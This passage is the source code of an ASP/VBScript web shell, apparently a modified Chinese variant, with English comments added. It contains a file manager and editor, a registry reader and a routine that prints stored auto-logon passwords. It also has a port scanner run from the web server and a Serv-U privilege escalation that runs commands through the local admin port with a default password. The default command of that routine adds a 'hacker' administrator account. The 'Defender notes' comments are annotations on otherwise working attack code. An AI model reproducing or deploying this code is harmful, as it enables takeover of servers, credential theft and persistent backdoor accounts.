("""&D.DriveLetter&":\\"")'>本地磁盘 ("&D.DriveLetter&":)</a><br>"
Next
End Function
' Show1File: lists the folder at Path.
' Sub-folders are written three per table row with copy / delete / move /
' download links; files follow, one table each, with download / edit / delete /
' copy / move links plus size in KB, type and last-modified time.
Function Show1File(Path)
Set FOLD=CF.GetFolder(Path)
i=0
SI="<table width='100%' border='0' cellspacing='0'
cellpadding='0'><tr>"
For Each F in FOLD.subfolders
SI=SI&"<td height=10>"
SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)
&""")' title=""打开""><font face='wingdings'
size='6'>0</font>"&F.Name&"</a>"
SI=SI&" _<a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""CopyFolder"")' onclick='return yesok()'
class='am' title='复制'>复制</a>"
SI=SI&" <a href='javascript:FullForm("""&Replace
(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok
()' class='am' title='删除'>删除</a>"
SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()'
class='am' title='移动'>移动</a>"
SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()'
class='am' title='下载'>下载</a></td>"
i=i+1
If i mod 3 = 0 then SI=SI&"</tr><tr>"
Next
SI=SI&"</tr><tr><td height=2></td></tr></table>"
RRS SI &"<hr noshade color=""#CCCCCC"" size=1 color=""#"" />" :
SI=""
For Each L in Fold.files
SI="<table width='100%' border='0' cellspacing='0'
cellpadding='0'>"
SI=SI&"<tr style='boungroup-color:#'>"
SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath
(Path&"\"&L.Name)&""",""DownFile"");' title='下载'><font
face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""EditFile"")' class='am' title='编辑'>编辑</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""CopyFile"")' class='am' title='复制'>复制</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""MoveFile"")' class='am' title='移动'>移动</a></td>"
SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
SI=SI&"</tr></table>"
RRS SI:SI=""
Next
Set FOLD=Nothing
End function
' DelFile: deletes the file at Path when it exists and prints a confirmation.
Function DelFile(Path)
If CF.FileExists(Path) Then
CF.DeleteFile Path
SI="<center><br><br><br>文件 "&Path&" 删除成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' EditFile: text editor for the file at Path.
' With Action2=Post the file is (re)created and the posted "content" written to
' it, then the response ends. Otherwise the current content is loaded, passed
' through HTMLEncode and shown in a form; an empty Path defaults to
' Session("FolderPath") & "\newfile.asp".
Function EditFile(Path)
If Request("Action2")="Post" Then
Set T=CF.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
Set T=nothing
SI="<center><br><br><br>文件保存成功!</center>"
SI=SI&BackUrl
RRS SI
Response.End
End If
If Path<>"" Then
Set T=CF.opentextfile(Path, 1, False)
Txt=HTMLEncode(T.readall)
T.close
Set T=Nothing
Else
Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件"
End If
SI=SI&"<Form action='"&URL&"?Action2=Post' method='post'
name='EditForm'>"
SI=SI&"<input name='Action' value='EditFile' Type='hidden'>"
SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>"
SI=SI&"<textarea name='Content'
style='width:100%;height:450'>"&Txt&"</textarea><br>"
SI=SI&"<hr><input name='goback' type='button' value='返回'
onclick='history.back();'> <input name='reset'
type='reset' value='重置'> <input name='submit'
type='submit' value='保存'></form>"
RRS SI
End Function
' CopyFile: Path is "source||||destination"; copies when the source exists and
' the destination is non-empty. A Path without the separator leaves Path(1)
' out of range (no error handling is set up in this method).
Function CopyFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.CopyFile Path(0),Path(1)
SI="<center><br><br><br>文件"&Path(0)&"复制成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' MoveFile: same "source||||destination" convention as CopyFile, using MoveFile.
Function MoveFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.MoveFile Path(0),Path(1)
SI="<center><br><br><br>文件"&Path(0)&"移动成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' DelFolder: deletes the folder at Path when it exists and prints a confirmation.
Function DelFolder(Path)
If CF.FolderExists(Path) Then
CF.DeleteFolder Path
SI="<center><br><br><br>目录"&Path&"删除成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' CopyFolder: "source||||destination"; copies the folder when the source exists.
Function CopyFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.CopyFolder Path(0),Path(1)
SI="<center><br><br><br>目录"&Path(0)&"复制成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' MoveFolder: "source||||destination"; moves the folder when the source exists.
Function MoveFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.MoveFolder Path(0),Path(1)
SI="<center><br><br><br>目录"&Path(0)&"移动成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
' NewFolder: creates the folder at Path when it is non-empty and does not exist yet.
Function NewFolder(Path)
If Not CF.FolderExists(Path) and Path<>"" Then
CF.CreateFolder Path
SI="<center><br><br><br>目录"&Path&"新建成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
End Class
' getTerminalInfo: prints the Terminal Services port and the auto-logon settings.
' Registry values read through WScript.Shell.RegRead:
'   ...\Terminal Server\WinStations\RDP-Tcp\PortNumber
'   ...\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon, DefaultUserName, DefaultPassword
' When AutoAdminLogon is not 0 the stored user name and password are written to
' the page; "False" is printed first when reading the password raised an error.
' Errors are suppressed for the whole sub (On Error Resume Next).
' Defender notes: a DefaultPassword value under Winlogon is clear text readable
' by any process with read access to that key. Where auto-logon is required,
' keep the credential out of this value (for example stored as an LSA secret),
' and audit reads of the Winlogon key by the web worker identity.
sub getTerminalInfo()
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername,
autoLoginPassword
terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
RRS "终端服务端口及自动登录<hr/><ol>"
If termPort = "" Or Err.Number <> 0 Then
RRS"无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
Else
RRS "当前终端服务端口: " & termPort & "<br/>"
End If
autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
RRS "系统自动登录功能未开启<br/>"
Else
autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
RRS "自动登录的系统帐户: " & autoLoginUsername & "<br>"
autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
If Err Then
Err.Clear
RRS "False"
End If
RRS "自动登录的帐户密码: " & autoLoginPassword & "<br>"
End If
RRS "</ol>"
End Sub
' ReadREG: form plus handler that reads one registry value chosen by the request.
' The form posts "thePath" (pre-filled with the ComputerName value path) and a
' hidden field theAct=readReg. A hidden span (display:none) carries a reference
' list of registry paths as static text; nothing in this sub reads those paths
' unless one is submitted.
' Handler: when request parameter "thePath" is non-empty it is passed unchanged
' to WScript.Shell.RegRead; an array result is printed element by element,
' anything else as a single item. Output is not HTML-encoded and errors are
' suppressed.
' Defender notes: the readable scope is whatever the web worker identity may
' read in the registry; requests carrying a parameter thePath whose value
' starts with HKLM\ or HKEY_ are the trace in web logs.
sub ReadREG()
RRS "注册表键值读取:<hr/>"
RRS "<form method=post>"
RRS "<input type=hidden value=readReg name=theAct>"
RRS "<input name=thePath
value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\
ComputerName' size=80>"
RRS " <input type=submit value=' 读取 '>"
RRS "<span id=regeditInfo style='display:none;'><hr/>"
RRS "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-
DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享
}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoSha
reServer,REG_DWORD,0 {禁止默认共享}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableS
haredNetDrives,REG_SZ,0 {关闭网络共享}<br/>"
RRS
"HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurity
Filters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}
<br/>"
RRS "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网
关}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}<br/>"
RRS "-----------OVER--------------------<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网
卡}<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的
序列(把上面的替换)}<br/>"
RRS "</span>"
RRS "</form><hr/>"
' Handler part: runs for GET or POST, since Request("thePath") searches both.
if Request("thePath")<>"" then
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
thePath=Request("thePath")
theArray=wsX.RegRead(thePath)
If IsArray(theArray) Then
For i=0 To UBound(theArray)
RRS "<li>" & theArray(i)
Next
Else
RRS "<li>" & theArray
End If
end if
end sub
' ScanPort: form plus handler that makes the server attempt connections to a
' list of addresses and ports and prints the elapsed time.
' Form fields: ip (pre-filled with the server's LOCAL_ADDR), port (pre-filled
' with PortList, a fixed default list unless one was posted) and a hidden
' marker "scan".
' Handler (when "scan" is posted): both lists are split on commas; an address
' entry containing "-" is expanded over its last octet, a port entry containing
' "-" over the numeric range; each pair is passed to Scan. Non-numeric port
' entries are reported in the output.
' Server.ScriptTimeout is raised to 7776000 seconds, so one request can keep a
' worker thread busy for a very long time.
' The variables IP and PortList set from the request are echoed into the form
' without HTML encoding (PortList) or not used further (IP).
' Defender notes: the connections originate from the web server itself, so they
' reach hosts that are only exposed internally. Outbound connection attempts
' from the web worker process to many ports in a short time, and a single
' long-running request to an .asp page, are the traces; egress filtering on the
' web tier limits the reach.
sub ScanPort()
Server.ScriptTimeout = 7776000
if request.Form("port")="" then
PortList="21,23,25,80,110,135,139,445,1433,3389,43958"
else
PortList=request.Form("port")
end if
if request.Form("ip")="" then
IP="127.0.0.1"
else
IP=request.Form("ip")
end if
RRS"<p>端口扫描器</p>"
RRS"<form name='form1' method='post' action=''
onSubmit='form1.submit.disabled=true;'>"
RRS"<p>Scan IP: "
RRS" <input name='ip' type='text' class='TextBox' id='ip'
value='"&Request.ServerVariables("LOCAL_ADDR")&"' size='60'>"
RRS"<br>Port List:"
RRS"<input name='port' type='text' class='TextBox' size='60'
value='"&PortList&"'>"
RRS"<br><br>"
RRS"<input name='submit' type='submit' class='buttom' value=' 扫描 '>"
RRS"<input name='scan' type='hidden' id='scan' value='111'>"
RRS"</p></form>"
If request.Form("scan") <> "" Then
timer1 = timer
RRS("<b>扫描报告:</b><br><hr>")
tmp = Split(request.Form("port"),",")
ip = Split(request.Form("ip"),",")
For hu = 0 to Ubound(ip)
If InStr(ip(hu),"-") = 0 Then
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ip(hu), tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ip(hu), j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Else
ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip
(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ipStart & xxx, tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ipStart & xxx,j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Next
End If
Next
timer2 = timer
thetime=cstr(int(timer2-timer1))
RRS"<hr>Process in "&thetime&" s"
END IF
end sub
' Scan: probes one address/port pair and prints whether it looks open or closed.
'   targetip - address, placed into the connection string as given.
'   portNum  - port, appended after a comma as the Data Source port.
' The probe is an ADODB connection through the SQLOLEDB provider with a
' 1-second timeout. The open is expected to fail; the result is derived from
' the error: for error numbers -2147217843 or -2147467259, a description
' containing "(Connect())." is reported as closed, any other description as
' open. Other outcomes (including a successful open) print nothing.
' The connection object is never closed or released in this sub.
' Defender notes: on the network these probes look like SQL Server client
' connection attempts from the web server to arbitrary ports; the fixed login
' name "lake2" with an empty password in the connection string is a content
' indicator for this code.
Sub Scan(targetip, portNum)
On Error Resume Next
set conn = Server.CreateObject("ADODB.connection")
connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","&
portNum &";User ID=lake2;Password=;"
conn.ConnectionTimeout = 1
conn.open connstr
If Err Then
If Err.number = -2147217843 or Err.number = -2147467259
Then
If InStr(Err.description, "(Connect()).") > 0
Then
RRS(targetip & ":" & portNum &
".........关闭<br>")
Else
RRS(targetip & ":" & portNum &
".........<font color=red>开放</font><br>")
End If
End If
End If
End Sub
Select Case Action
Case "MainMenu":MainMenu()
Case "getTerminalInfo":getTerminalInfo()
case "ScanPort":ScanPort()
Case "Servu"
SUaction=request("SUaction")
if not isnumeric(SUaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "
PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" &
ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" &
vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-
PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" &
vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-
Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-
AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf &
"-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-
SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" &
vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-
QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" &
vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case SUaction
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True,
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser &
quit
set session("a")=a
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction'
value='2'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在连接 127.0.0.1:"&port&",使用用户名:
"&user&",口令:"&pass&"...<center>');"
RRS"setTimeout('document.all.goldsun.submit();',4000);"
RRS"</script>"
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2",
True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd &
vbCrLf & quit
set session("b")=b
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction'
value='3'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在提升权限,请等待…………<center>');"
RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
RRS"</script>"
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True,
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
RRS"<center>提权完毕,已执行了命令:<br><font
color=red>"&cmd&"</font><br><br>"
RRS"<input type=button value=' 返回继续 ' onClick=""location.href='?
Action=Servu';"">"
RRS"</center>"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
RRS"<center><form method='post' name='goldsun'>"
RRS"<table width='494' height='163' border='1' cellpadding='0'
cellspacing='1' bordercolor='#666666'>"
RRS"<tr align='center' valign='middle'>"
RRS"<td colspan='2'>Serv-U 提升权限 漫步云端修改版</td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td width='100'>用户名:</td>"
RRS"<td width='379'><input name='u' type='text' id='u'
value='LocalAdministrator'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>口 令:</td>"
RRS"<td><input name='p' type='text' id='p'
value='#l@$ak#.lk;0@P'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>端 口:</td>"
RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>系统路径:</td>"
RRS" <td><input name='f' type='text' id='f' value='"&f&"'
size='8'></td>"
RRS" </tr>"
RRS" <tr align='center' valign='middle'>"
RRS" <td>命 令:</td>"
RRS" <td><input name='c' type='text' id='c' value='cmd /c net user
hacker 123456 /add & net localgroup administrators hacker /add'
size='50'></td>"
RRS" </tr>"
RRS" <tr align='center' valign='middle'>"
RRS" <td colspan='2'><input type='submit' name='Submit' value='提
交'> "
RRS"<input type='reset' name='Submit2' value='重置'>"
RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
RRS"</tr></table></form></center>"
end select
' Gpath: returns the drive of the Windows folder as a two-character,
' lower-cased string such as "c:".
' GetSpecialFolder(0) is the Windows folder; only its first two characters are
' kept. When creating the FileSystemObject raises a positive error number the
' function returns "c:" instead.
' NOTE(review): COM errors are usually negative numbers, so the err.number>0
' test may not catch a failed CreateObject -- confirm.
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Case "kmuma"
dim Report
if request.QueryString("act")<>"scan" then
RRS ("<b>网站根目录</b>- "&Server.MapPath("/")&"<br>")
RRS ("<b>本程序目录</b>- "&Server.MapPath("."))
RRS "<form action=""?Action=kmuma&act=scan""
method=""post"" name=""form1"">"
RRS "<p><b>填入你要检查的路径:</b>"
RRS "<input name=""path"" type=""text""
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录<br><br>"
RRS "你要干什么: <input class=c name=""radiobutton""
type=""radio"" value=""sws"" onClick=""document.getElementById
('showFile1').style.display='none'"" checked>查ASP 马"
RRS "<input class=c type=""radio"" name=""radiobutton""
value=""sf"" onClick=""document.getElementById
('showFile1').style.display=''"">搜索符合条件之文件<br>"
RRS "<br /><div id=""showFile1""
style=""display:none"">"
RRS " 查找内容:<input
name=""Search_Content"" type=""text"" id=""Search_Content""
style=""border:1px solid #999"" size=""20"">"
RRS " 要查找的字符串,不填就只进行日期检查<br />"
RRS " 修改日期:<input name=""Search_Date""
type=""text"" style=""border:1px solid #999"" value="""&Left(Now
(),InStr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写
<a href=""#""
onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
RRS " 文件类型:<input
name=""Search_FileExt"" type=""text"" style=""border:1px solid #999""
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型<br /><br
/></div>"
RRS "<input type=""submit"" value="" 开始扫描 ""
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px
2px;margin:4px;"" />"
RRS "</form>"
else
if request.Form("path")="" then
RRS("路径不能为空")
response.End()
end if
if request.Form("path")="\" then
TmpPath = Server.MapPath("\")
elseif request.Form("path")="." then
TmpPath = Server.MapPath(".")
else
TmpPath = request.Form("path")
end if
timer1 = timer
Sun = 0
SumFiles = 0
SumFolders = 1
If request.Form("radiobutton") = "sws" Then
DimFileExt = "asp,cer,asa,cdx"
Call ShowAllFile(TmpPath)
Else
If request.Form("path") = "" or request.Form
("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
RRS("缉捕条件不完全<br><br><a
href='javascript:history.go(-1);'>请返回重新输入</a>")
response.End()
End If
DimFileExt = request.Form("Search_fileExt")
Call ShowAllFile2(TmpPath)
End If
RRS "<table width=""100%"" border=""0"" cellpadding=""0""
cellspacing=""0"" style='font-size:12px'>"
RRS "<tr><th>Scan WebShell -- 漫步云端修改版</tr>"
RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid
#89441f;padding:4px;display:none""></div>"
RRS "扫描完毕!一共检查文件夹<font
color=""#FF0000"">"&SumFolders&"</font>个,文件<font
color=""#FF0000"">"&SumFiles&"</font>个,发现可疑点<font
color=""#FF0000"">"&Sun&"</font>个"
RRS "<table width=""100%"" border=""1"" cellpadding=""0""
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
If request.Form("radiobutton") = "sws" Then
RRS "<td width=""20%"">文件相对路径</td>"
RRS "<td width=""20%"">特征码</td>"
RRS "<td width=""40%"">描述</td>"
RRS "<td width=""20%"">创建/修改时间</td>"
else
RRS "<td width=""50%"">文件相对路径</td>"
RRS "<td width=""25%"">文件创建时间</td>"
RRS "<td width=""25%"">修改时间</td>"
end if
RRS "</tr>"
RRS Report
RRS "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
RRS "<br><font style='font-size:12px'>本页执行共用了"&thetime&"毫秒
</font>"
end if
' Recursively walks Path and passes every file whose extension is accepted by
' CheckExt to ScanFile. SumFiles and SumFolders are the running totals printed
' in the scan summary.
' Path: folder to walk; a folder that does not exist is skipped without a message.
' NOTE(review): Temp is never assigned inside this Sub, so Path&Temp&"\" presumably
' concatenates an empty value - confirm no script-level Temp carries data here.
' NOTE(review): no Dim statements are visible, so f, fc, fc2, myfile and f1 may be
' shared with other procedures using the same names (GetDateModify and
' GetDateCreate also assign f) - confirm before refactoring.
Sub ShowAllFile(Path)
Set F1SO = CreateObject("Scripting.FileSystemObject")
if not F1SO.FolderExists(path) then exit sub
Set f = F1SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F1SO.GetExtensionName
(path&"\"&myfile.name)) Then
Call ScanFile(Path&Temp&"\"&myfile.name, "")
SumFiles = SumFiles + 1
End If
Next
' Descend into every subfolder; no depth limit is applied in this Sub.
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile path&"\"&f1.name
SumFolders = SumFolders + 1
Next
Set F1SO = Nothing
End Sub
' Heuristic scan of one script file for constructs commonly found in ASP web shells.
' FilePath: file on disk to read.
' InFile:   relative path of the file that referenced this one (include,
'           Server.Execute/Transfer or script src), or "" when the file came
'           from the directory walk.
' Every hit appends one HTML table row to Report and increments Sun; this Sub
' only reads files, it does not modify them.
' Checks, in order: WScript.Shell and Shell.Application (ProgID or CLSID), an
' encoded-script LANGUAGE attribute, Eval, Execute, FSO Open/CreateTextFile,
' SaveToFile, .Save; then it follows #include file/virtual, Server.Execute /
' Server.Transfer with a quoted path and <script runat=server src=...> targets
' by calling itself; finally it flags CreateObject calls whose argument
' contains & or +, has no quoted string, or has nested parentheses.
' Detection note: the signature names are assembled from pieces
' ("WScr"&DoMyBest&"ipt.Shell", "Ev"&"al", ...), so this file does not contain
' them as literal text. DoMyBest is not defined in the visible code and is
' presumably empty - confirm. Matching on literal names alone misses code
' written this way; the CreateObject check at the end targets that kind of
' concatenation.
' NOTE(review): no Dim statements are visible; temp, regEx, Matches and the
' other working variables may be shared with callers and with the recursive
' calls made below - confirm.
Sub ScanFile(FilePath, InFile)
Server.ScriptTimeout=999999999
If InFile <> "" Then
Infiles = "<font color=red>该文件被<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(InFile)&""" target=_blank>"& InFile & "</a>文件包含执行</font>"
End If
' Files that cannot be opened or read are skipped silently (Exit Sub on error).
Set FSO1s = CreateObject("Scripting.FileSystemObject")
on error resume next
set ofile = FSO1s.OpenTextFile(FilePath)
filetxt = Lcase(ofile.readall())
If err Then Exit Sub end if
' Empty files produce no rows.
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
' First table cell: link to the file relative to the web root, followed by
' edit / delete / copy / move links that call the page's FullForm() script.
temp = "<a href=""http://"&Request.Servervariables
("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
